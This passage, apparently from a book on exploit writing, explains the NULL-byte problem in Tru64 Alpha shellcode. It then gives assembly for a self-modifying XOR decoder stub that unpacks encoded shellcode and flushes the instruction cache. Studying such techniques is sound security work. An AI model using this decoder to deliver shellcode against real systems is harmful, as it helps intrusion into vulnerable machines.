The first challenge in developing Tru64 shellcode lies in the fact that the PAL_callsys instruction is not NULL free. PAL_callsys opcode has three NULL bytes ( \x83\x00\x00\x00 ); there is no way to alternate it with other opcode, because PAL_callsys is the only way in which to invoke system calls. Some programmers who have dealt with this problem have come up with two remedies; however, we believe there is a better solution. The first remedy is to encode the PAL_callsys instruction on the stack, and then call it whenever a system call is requested . This solution cannot work on Tru64 ”remember, the stack is not executable by default. Calling code on the stack will terminate the process with SIGSEGV immediately. The other solution is to write self-modifying shellcode that will encode the PAL_callsys in the shellcode text at runtime. This strategy is most similar to our solution, but it is still not efficient ”a shellcode that makes lots of system calls grows exponentially. If you use this method, you will also need to flush the I-cache whenever you modify any instruction. Ironically, the instruction that flushes the I-cache also contains three NULL bytes, rendering the entire effort useless. Therefore, we obviously need a new method. The best solution to these NULL byte struggles is to use the method described in Chapter 3 of this book, "Shellcode." The following code is our implementation of a simple Aalpha assembly XOR decoder. It is not optimized so feel free to improve and compact it if you wish.
#include <alpha/regdef.h> #include <alpha/pal.h> .text .arch generic .align 4 .globl main .ent main main: .frame $sp, 0, lda a0, -1000(sp) #GetPC code we have just covered. back: bis zero, 0x86, a1 #a1 equals to 0x00000086 which is the imb #instruction, syncs the instruction cache thus #make it coherent with main memory. #1st run: store imb instruction in sp - 1000 stack. stl a1, -4(a0) #2nd run: overwrite the following bsr instruction #with imb. addq a0, 48, a2 stl a1, -4(a2) #also overwrite the 0x41414141 with the imb #instruction thus avoiding i-cache incoherency #after the decode process since imb instruction #also have NULL bytes this is the only #way to avoid NULL bytes in decoder loop. bsr a0, back #branch the label back saving pc in a0 register. #on the second run bsr will be overwritten. #execution will continue with the next instruction. addq a0, 52, a4 #offset to xored data plus four. addq zero, 212, a3 #size of xored data in bytes. !!CHANGE HERE!! addq a0, 264, a5 #offset to xor key; equals to xordata size plus 52. #!CHANGE! this offset addq a0, 48, a0 #a0 should point to the first instruction of the #xored data, real shellcode should be expecting #it this way. ldl a1, -4(a5) #load the xor key. xorloop: ldl a2, -4(a4) #load a single long from the xored data. xor a2, a1, a2 #xor/decrypt the long. stl a2, -4(a4) #store the long back into its location. subq a3, 4, a3 #decrement counter. addq a4, 4, a4 #increment xored data pointer, move to next long. bne a3, xorloop #branch back to xorloop till counter is zero. .long 0x41414141 #this long will be overwriten with the imb #instruction. flush I-cache. #xored data starts here. Place the real shellcode #encoded with the following XOR key. !CHANGE! .long 0x88888888 #XOR key. !!CHANGE HERE if necessary!!